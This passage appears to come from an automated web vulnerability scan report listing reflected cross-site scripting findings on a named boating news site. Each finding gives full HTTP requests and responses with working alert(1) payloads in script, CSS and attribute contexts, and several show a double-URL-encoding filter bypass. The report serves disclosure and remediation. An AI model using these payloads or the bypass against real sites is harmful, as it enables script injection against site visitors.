Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21ca19a";alert(1)//c1fee88792f",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

2.58. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color_inactive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_border_color_inactive request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a1f1"%3balert(1)//90a46394978 was submitted in the thumbnail_border_color_inactive parameter. This input was echoed as 8a1f1";alert(1)//90a46394978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff8a1f1"%3balert(1)//90a46394978&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff8a1f1";alert(1)//90a46394978",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false,
   "actual_animation_p":false,
   "actual_slide":0
};

2.59. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_margin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_margin request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97436%3balert(1)//8a6cc5501ee was submitted in the thumbnail_margin parameter. This input was echoed as 97436;alert(1)//8a6cc5501ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=597436%3balert(1)//8a6cc5501ee&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":597436;alert(1)//8a6cc5501ee,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false
...[SNIP]...

2.60. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 232a2%3balert(1)//686be8d0403 was submitted in the thumbnail_width parameter. This input was echoed as 232a2;alert(1)//686be8d0403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66232a2%3balert(1)//686be8d0403&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66232a2;alert(1)//686be8d0403,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   
...[SNIP]...

2.61. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [img_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the img_width request parameter is copied into the HTML document as plain text between tags. The payload e4ade<script>alert(1)</script>e6a9f213599 was submitted in the img_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=news_home_waters&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195pxe4ade<script>alert(1)</script>e6a9f213599&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


#news_home_waters a.readon_class{
   float: left;}

#news_home_waters h4.gk_news_show_news_header {
   margin: 0 0 8px;
   padding:0;
   text-align: left;}

#news_home_waters img.gk_news_show_news_image {
   display: block;float: left;}

#news_home_waters img.gk_news_show_news_image_static {
   display: block;float: left;width: 195pxe4ade<script>alert(1)</script>e6a9f213599;}

#news_home_waters a.gk_news_show_news_readmore {
}

#news_home_waters a.gk_news_show_news_readmore_inline {
   margin-left: 10px;
}

#news_home_waters p.gk_news_show_news_text {
   margin-top
...[SNIP]...

2.62. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [modid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the modid request parameter is copied into the HTML document as plain text between tags. The payload 75723<script>alert(1)</script>13bc00b91d6 was submitted in the modid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=news_home_waters75723<script>alert(1)</script>13bc00b91d6&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195px&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


#news_home_waters75723<script>alert(1)</script>13bc00b91d6 a.readon_class{
   float: left;}

#news_home_waters75723<script>alert(1)</script>13bc00b91d6 h4.gk_news_show_news_header {
   margin: 0 0 8
...[SNIP]...

2.63. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3faa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef66606158cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3faa"><script>alert(1)</script>f66606158cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /more/digital-publications?c3faa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef66606158cb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/digital-publications?c3faa"><script>alert(1)</script>f66606158cb=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.64. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b8b831275 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbd9c"><script>alert(1)</script>72b8b831275 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /more/the-masters-series?cbd9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b8b831275=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/the-masters-series?cbd9c"><script>alert(1)</script>72b8b831275=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.65. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23200%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22acdd97a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23200"><script>alert(1)</script>22acdd97a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news?23200%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22acdd97a8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news?23200"><script>alert(1)</script>22acdd97a8=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.66. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd689%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3604a112d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd689"><script>alert(1)</script>3604a112d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/coastwise?cd689%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3604a112d5=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/coastwise?cd689"><script>alert(1)</script>3604a112d5=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.67. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d1219e4f8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f10d"><script>alert(1)</script>5d1219e4f8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/dispatches?1f10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d1219e4f8e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/dispatches?1f10d"><script>alert(1)</script>5d1219e4f8e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.68. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc440%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4fc62980f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc440"><script>alert(1)</script>d4fc62980f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home-waters?fc440%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4fc62980f3=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/home-waters?fc440"><script>alert(1)</script>d4fc62980f3=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.69. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e5db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecfbc5b7ba90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e5db"><script>alert(1)</script>cfbc5b7ba90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/mishaps-a-rescues?6e5db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecfbc5b7ba90=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:14 GMT
